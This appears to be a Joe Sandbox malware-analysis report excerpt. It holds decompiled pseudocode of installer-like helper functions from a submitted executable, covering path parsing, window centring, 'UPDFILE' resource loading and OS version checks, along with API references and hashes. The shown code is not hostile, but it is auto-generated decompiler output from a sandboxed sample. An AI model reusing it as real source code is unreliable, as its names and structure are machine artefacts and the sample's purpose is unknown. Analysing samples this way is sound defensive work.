                                                                                                                                                                                                                                            									goto L17;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								E00A465E8( &_v268);
                                                                                                                                                                                                                                            								_t55 =  &_v268;
                                                                                                                                                                                                                                            								_t62 = _t55 + 1;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t34 =  *_t55;
                                                                                                                                                                                                                                            									_t55 = _t55 + 1;
                                                                                                                                                                                                                                            								} while (_t34 != 0);
                                                                                                                                                                                                                                            								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                                                            								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                                                            									 *_t38 = 0;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								E00A41680(_t65, E00A417C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                            								_t59 = _t65;
                                                                                                                                                                                                                                            								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                                                            								_t60 = _t12;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t42 =  *_t59;
                                                                                                                                                                                                                                            									_t59 =  &(_t59[1]);
                                                                                                                                                                                                                                            								} while (_t42 != 0);
                                                                                                                                                                                                                                            								L17:
                                                                                                                                                                                                                                            								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *_t65 = _t17;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A46CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                                            0x00a42aac
                                                                                                                                                                                                                                            0x00a42ab7
                                                                                                                                                                                                                                            0x00a42abc
                                                                                                                                                                                                                                            0x00a42abe
                                                                                                                                                                                                                                            0x00a42ac3
                                                                                                                                                                                                                                            0x00a42ac6
                                                                                                                                                                                                                                            0x00a42ac9
                                                                                                                                                                                                                                            0x00a42ace
                                                                                                                                                                                                                                            0x00a42ae6
                                                                                                                                                                                                                                            0x00a42bdc
                                                                                                                                                                                                                                            0x00a42bdc
                                                                                                                                                                                                                                            0x00a42be0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42af2
                                                                                                                                                                                                                                            0x00a42afc
                                                                                                                                                                                                                                            0x00a42b00
                                                                                                                                                                                                                                            0x00a42b05
                                                                                                                                                                                                                                            0x00a42b05
                                                                                                                                                                                                                                            0x00a42b0b
                                                                                                                                                                                                                                            0x00a42bca
                                                                                                                                                                                                                                            0x00a42bd1
                                                                                                                                                                                                                                            0x00a42b11
                                                                                                                                                                                                                                            0x00a42b18
                                                                                                                                                                                                                                            0x00a42b26
                                                                                                                                                                                                                                            0x00a42b99
                                                                                                                                                                                                                                            0x00a42bc8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42b9b
                                                                                                                                                                                                                                            0x00a42bae
                                                                                                                                                                                                                                            0x00a42bb3
                                                                                                                                                                                                                                            0x00a42bb5
                                                                                                                                                                                                                                            0x00a42bb5
                                                                                                                                                                                                                                            0x00a42bb8
                                                                                                                                                                                                                                            0x00a42bb8
                                                                                                                                                                                                                                            0x00a42bba
                                                                                                                                                                                                                                            0x00a42bbb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42bb8
                                                                                                                                                                                                                                            0x00a42b28
                                                                                                                                                                                                                                            0x00a42b2e
                                                                                                                                                                                                                                            0x00a42b33
                                                                                                                                                                                                                                            0x00a42b39
                                                                                                                                                                                                                                            0x00a42b3c
                                                                                                                                                                                                                                            0x00a42b3c
                                                                                                                                                                                                                                            0x00a42b3e
                                                                                                                                                                                                                                            0x00a42b3f
                                                                                                                                                                                                                                            0x00a42b55
                                                                                                                                                                                                                                            0x00a42b5d
                                                                                                                                                                                                                                            0x00a42b64
                                                                                                                                                                                                                                            0x00a42b64
                                                                                                                                                                                                                                            0x00a42b7a
                                                                                                                                                                                                                                            0x00a42b7f
                                                                                                                                                                                                                                            0x00a42b81
                                                                                                                                                                                                                                            0x00a42b81
                                                                                                                                                                                                                                            0x00a42b84
                                                                                                                                                                                                                                            0x00a42b84
                                                                                                                                                                                                                                            0x00a42b86
                                                                                                                                                                                                                                            0x00a42b87
                                                                                                                                                                                                                                            0x00a42bbf
                                                                                                                                                                                                                                            0x00a42bc1
                                                                                                                                                                                                                                            0x00a42bc1
                                                                                                                                                                                                                                            0x00a42b26
                                                                                                                                                                                                                                            0x00a42bda
                                                                                                                                                                                                                                            0x00a42bda
                                                                                                                                                                                                                                            0x00a42be6
                                                                                                                                                                                                                                            0x00a42be6
                                                                                                                                                                                                                                            0x00a42bf8

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00A42AE6
                                                                                                                                                                                                                                            • IsDBCSLeadByte.KERNEL32(00000000), ref: 00A42AF2
                                                                                                                                                                                                                                            • CharNextA.USER32(?), ref: 00A42B12
                                                                                                                                                                                                                                            • CharUpperA.USER32 ref: 00A42B1E
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,?), ref: 00A42B55
                                                                                                                                                                                                                                            • CharNextA.USER32(?), ref: 00A42BD4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 571164536-0
                                                                                                                                                                                                                                            • Opcode ID: 561059cd6ee822189f3205d495ee4ba9fcae6796a2b6dfa018b47a287969c5b1
                                                                                                                                                                                                                                            • Instruction ID: 03237458580ec29a2dbddfcec671bdb08432aef092f54e20953936de3705834b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 561059cd6ee822189f3205d495ee4ba9fcae6796a2b6dfa018b47a287969c5b1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB41D03C5042859EDB159F249C54BFE7BA9DFD7300F54419AE8C287202DB268E87CB61
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E00A443D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				struct tagRECT _v24;
                                                                                                                                                                                                                                            				struct tagRECT _v40;
                                                                                                                                                                                                                                            				struct HWND__* _v44;
                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                            				int _v52;
                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                            				int _v60;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				void* _t53;
                                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                                            				int _t59;
                                                                                                                                                                                                                                            				struct HWND__* _t63;
                                                                                                                                                                                                                                            				struct HWND__* _t67;
                                                                                                                                                                                                                                            				struct HWND__* _t68;
                                                                                                                                                                                                                                            				struct HDC__* _t69;
                                                                                                                                                                                                                                            				int _t72;
                                                                                                                                                                                                                                            				signed int _t74;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t63 = __edx;
                                                                                                                                                                                                                                            				_t29 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                                                            				_t68 = __edx;
                                                                                                                                                                                                                                            				_v44 = __ecx;
                                                                                                                                                                                                                                            				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                                                            				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                                                            				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                                                            				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                                                            				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                                                            				_t69 = GetDC(_v44);
                                                                                                                                                                                                                                            				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                                                            				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                                                            				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                                                            				_t56 = _v48;
                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                            				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                                                            				_t67 = 0;
                                                                                                                                                                                                                                            				if(_t72 >= 0) {
                                                                                                                                                                                                                                            					_t63 = _v52;
                                                                                                                                                                                                                                            					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                                                            						_t72 = _t63 - _t56;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t72 = _t67;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                            				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                                                            				if(_t59 >= 0) {
                                                                                                                                                                                                                                            					_t63 = _v60;
                                                                                                                                                                                                                                            					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                                                            						_t59 = _t63 - _t53;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t59 = _t67;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A46CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                                                            			}
























                                                                                                                                                                                                                                            0x00a443d0
                                                                                                                                                                                                                                            0x00a443d8
                                                                                                                                                                                                                                            0x00a443df
                                                                                                                                                                                                                                            0x00a443e6
                                                                                                                                                                                                                                            0x00a443ec
                                                                                                                                                                                                                                            0x00a443f1
                                                                                                                                                                                                                                            0x00a44400
                                                                                                                                                                                                                                            0x00a44403
                                                                                                                                                                                                                                            0x00a4440b
                                                                                                                                                                                                                                            0x00a44420
                                                                                                                                                                                                                                            0x00a44429
                                                                                                                                                                                                                                            0x00a44437
                                                                                                                                                                                                                                            0x00a44444
                                                                                                                                                                                                                                            0x00a44447
                                                                                                                                                                                                                                            0x00a4444d
                                                                                                                                                                                                                                            0x00a44454
                                                                                                                                                                                                                                            0x00a4445b
                                                                                                                                                                                                                                            0x00a44460
                                                                                                                                                                                                                                            0x00a44461
                                                                                                                                                                                                                                            0x00a44467
                                                                                                                                                                                                                                            0x00a4446f
                                                                                                                                                                                                                                            0x00a44473
                                                                                                                                                                                                                                            0x00a44473
                                                                                                                                                                                                                                            0x00a44463
                                                                                                                                                                                                                                            0x00a44463
                                                                                                                                                                                                                                            0x00a44463
                                                                                                                                                                                                                                            0x00a4447a
                                                                                                                                                                                                                                            0x00a44481
                                                                                                                                                                                                                                            0x00a44484
                                                                                                                                                                                                                                            0x00a4448a
                                                                                                                                                                                                                                            0x00a44492
                                                                                                                                                                                                                                            0x00a44496
                                                                                                                                                                                                                                            0x00a44496
                                                                                                                                                                                                                                            0x00a44486
                                                                                                                                                                                                                                            0x00a44486
                                                                                                                                                                                                                                            0x00a44486
                                                                                                                                                                                                                                            0x00a444b8

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00A443F1
                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00A4440B
                                                                                                                                                                                                                                            • GetDC.USER32(?), ref: 00A44423
                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 00A4442E
                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00A4443A
                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00A44447
                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 00A444A2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2212493051-0
                                                                                                                                                                                                                                            • Opcode ID: 2db2b571eeebfc898378c1710488ddf51459b53df6d0585a31a0ed1a00349fe0
                                                                                                                                                                                                                                            • Instruction ID: 09e627620d5225456f532c7014d2fcc558840ea8f017e7ca10c8d6f3f05f2b73
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2db2b571eeebfc898378c1710488ddf51459b53df6d0585a31a0ed1a00349fe0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68312D3AE00519AFCB14CFF8DD899EEBBB5EBC9310F154269F805B3250DA316D058B60
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                                            			E00A46298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _v36;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t16;
                                                                                                                                                                                                                                            				struct HRSRC__* _t21;
                                                                                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				intOrPtr* _t40;
                                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                                            				intOrPtr* _t44;
                                                                                                                                                                                                                                            				intOrPtr* _t45;
                                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t51;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t44 = __edx;
                                                                                                                                                                                                                                            				_t16 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                                                            				_t46 = 0;
                                                                                                                                                                                                                                            				_v32 = __ecx;
                                                                                                                                                                                                                                            				_v36 = 0;
                                                                                                                                                                                                                                            				_t36 = 1;
                                                                                                                                                                                                                                            				E00A4171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t51 = _t51 + 0x10;
                                                                                                                                                                                                                                            					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                                                            					if(_t21 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                                                            					if(_t45 == 0) {
                                                                                                                                                                                                                                            						 *0xa49124 = 0x80070714;
                                                                                                                                                                                                                                            						_t36 = _t46;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                                                            						_t44 = _t5;
                                                                                                                                                                                                                                            						_t40 = _t44;
                                                                                                                                                                                                                                            						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                                                            						_t47 = _t6;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t26 =  *_t40;
                                                                                                                                                                                                                                            							_t40 = _t40 + 1;
                                                                                                                                                                                                                                            						} while (_t26 != 0);
                                                                                                                                                                                                                                            						_t41 = _t40 - _t47;
                                                                                                                                                                                                                                            						_t46 = _t51;
                                                                                                                                                                                                                                            						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                                                            						 *0xa4a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                                                            						_t30 = _v32();
                                                                                                                                                                                                                                            						if(_t51 != _t51) {
                                                                                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(_t45);
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							_t36 = 0;
                                                                                                                                                                                                                                            							FreeResource(??);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							FreeResource();
                                                                                                                                                                                                                                            							_v36 = _v36 + 1;
                                                                                                                                                                                                                                            							E00A4171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                                                            							_t46 = 0;
                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					return E00A46CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L12;
                                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                                            0x00a46298
                                                                                                                                                                                                                                            0x00a462a0
                                                                                                                                                                                                                                            0x00a462a7
                                                                                                                                                                                                                                            0x00a462ad
                                                                                                                                                                                                                                            0x00a462af
                                                                                                                                                                                                                                            0x00a462bb
                                                                                                                                                                                                                                            0x00a462c3
                                                                                                                                                                                                                                            0x00a462c4
                                                                                                                                                                                                                                            0x00a4633b
                                                                                                                                                                                                                                            0x00a4633b
                                                                                                                                                                                                                                            0x00a46345
                                                                                                                                                                                                                                            0x00a4634d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a462da
                                                                                                                                                                                                                                            0x00a462de
                                                                                                                                                                                                                                            0x00a4635f
                                                                                                                                                                                                                                            0x00a46369
                                                                                                                                                                                                                                            0x00a462e0
                                                                                                                                                                                                                                            0x00a462e0
                                                                                                                                                                                                                                            0x00a462e0
                                                                                                                                                                                                                                            0x00a462e3
                                                                                                                                                                                                                                            0x00a462e5
                                                                                                                                                                                                                                            0x00a462e5
                                                                                                                                                                                                                                            0x00a462e8
                                                                                                                                                                                                                                            0x00a462e8
                                                                                                                                                                                                                                            0x00a462ea
                                                                                                                                                                                                                                            0x00a462eb
                                                                                                                                                                                                                                            0x00a462ef
                                                                                                                                                                                                                                            0x00a462f1
                                                                                                                                                                                                                                            0x00a462f3
                                                                                                                                                                                                                                            0x00a46302
                                                                                                                                                                                                                                            0x00a46308
                                                                                                                                                                                                                                            0x00a4630d
                                                                                                                                                                                                                                            0x00a46314
                                                                                                                                                                                                                                            0x00a46314
                                                                                                                                                                                                                                            0x00a46316
                                                                                                                                                                                                                                            0x00a46319
                                                                                                                                                                                                                                            0x00a46355
                                                                                                                                                                                                                                            0x00a46357
                                                                                                                                                                                                                                            0x00a4631b
                                                                                                                                                                                                                                            0x00a4631b
                                                                                                                                                                                                                                            0x00a46331
                                                                                                                                                                                                                                            0x00a46334
                                                                                                                                                                                                                                            0x00a46339
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a46339
                                                                                                                                                                                                                                            0x00a46319
                                                                                                                                                                                                                                            0x00a4636b
                                                                                                                                                                                                                                            0x00a4637d
                                                                                                                                                                                                                                            0x00a4637d
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A4171E: _vsnprintf.MSVCRT ref: 00A41750
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00A451CA,00000004,00000024,00A42F71,?,00000002,00000000), ref: 00A462CD
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A451CA,00000004,00000024,00A42F71,?,00000002,00000000), ref: 00A462D4
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A451CA,00000004,00000024,00A42F71,?,00000002,00000000), ref: 00A4631B
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00A46345
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A451CA,00000004,00000024,00A42F71,?,00000002,00000000), ref: 00A46357
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                            • String ID: UPDFILE%lu
                                                                                                                                                                                                                                            • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                            • Opcode ID: 672d30673ffe0fb7495e364e4638537c181a3aba564abcd8b2325441d58e8227
                                                                                                                                                                                                                                            • Instruction ID: 310f84ef5f3859c3df3d252d89a6b60caf86e2bde9b062e0606866d28b277d51
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 672d30673ffe0fb7495e364e4638537c181a3aba564abcd8b2325441d58e8227
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E121D67DA00219ABDB10DFA4DC459FF7B78FBCA714B000219F902A7241DB769D068BE1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00A4681F(void* __ebx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                            				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                                                            				void* _v172;
                                                                                                                                                                                                                                            				int* _v176;
                                                                                                                                                                                                                                            				int _v180;
                                                                                                                                                                                                                                            				int _v184;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				long _t31;
                                                                                                                                                                                                                                            				signed int _t35;
                                                                                                                                                                                                                                            				void* _t36;
                                                                                                                                                                                                                                            				intOrPtr _t41;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t36 = __ebx;
                                                                                                                                                                                                                                            				_t19 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                                                            				_t41 =  *0xa481d8; // 0x0
                                                                                                                                                                                                                                            				_t43 = 0;
                                                                                                                                                                                                                                            				_v180 = 0xc;
                                                                                                                                                                                                                                            				_v176 = 0;
                                                                                                                                                                                                                                            				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                                                            					 *0xa481d8 = 0;
                                                                                                                                                                                                                                            					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                            					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                                                            						L12:
                                                                                                                                                                                                                                            						_t41 =  *0xa481d8; // 0x0
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t41 = 1;
                                                                                                                                                                                                                                            						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                                                            							goto L12;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t31 = RegQueryValueExA(_v172, 0xa41140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                                                            							_t43 = _t31;
                                                                                                                                                                                                                                            							RegCloseKey(_v172);
                                                                                                                                                                                                                                            							if(_t31 != 0) {
                                                                                                                                                                                                                                            								goto L12;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t40 =  &_v176;
                                                                                                                                                                                                                                            								if(E00A466F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                                                            									goto L12;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                                                            									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                                                            										 *0xa481d8 = _t41;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										goto L12;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A46CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x00a4681f
                                                                                                                                                                                                                                            0x00a4682a
                                                                                                                                                                                                                                            0x00a46831
                                                                                                                                                                                                                                            0x00a46836
                                                                                                                                                                                                                                            0x00a4683c
                                                                                                                                                                                                                                            0x00a4683e
                                                                                                                                                                                                                                            0x00a46848
                                                                                                                                                                                                                                            0x00a46851
                                                                                                                                                                                                                                            0x00a4685d
                                                                                                                                                                                                                                            0x00a46864
                                                                                                                                                                                                                                            0x00a46876
                                                                                                                                                                                                                                            0x00a4693a
                                                                                                                                                                                                                                            0x00a4693a
                                                                                                                                                                                                                                            0x00a4687c
                                                                                                                                                                                                                                            0x00a4687e
                                                                                                                                                                                                                                            0x00a46885
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a468d6
                                                                                                                                                                                                                                            0x00a468f4
                                                                                                                                                                                                                                            0x00a46900
                                                                                                                                                                                                                                            0x00a46902
                                                                                                                                                                                                                                            0x00a4690a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4690c
                                                                                                                                                                                                                                            0x00a4690c
                                                                                                                                                                                                                                            0x00a4691c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4691e
                                                                                                                                                                                                                                            0x00a46924
                                                                                                                                                                                                                                            0x00a4692b
                                                                                                                                                                                                                                            0x00a46932
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4692b
                                                                                                                                                                                                                                            0x00a4691c
                                                                                                                                                                                                                                            0x00a4690a
                                                                                                                                                                                                                                            0x00a46885
                                                                                                                                                                                                                                            0x00a46876
                                                                                                                                                                                                                                            0x00a46951

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00A4686E
                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000004A), ref: 00A468A7
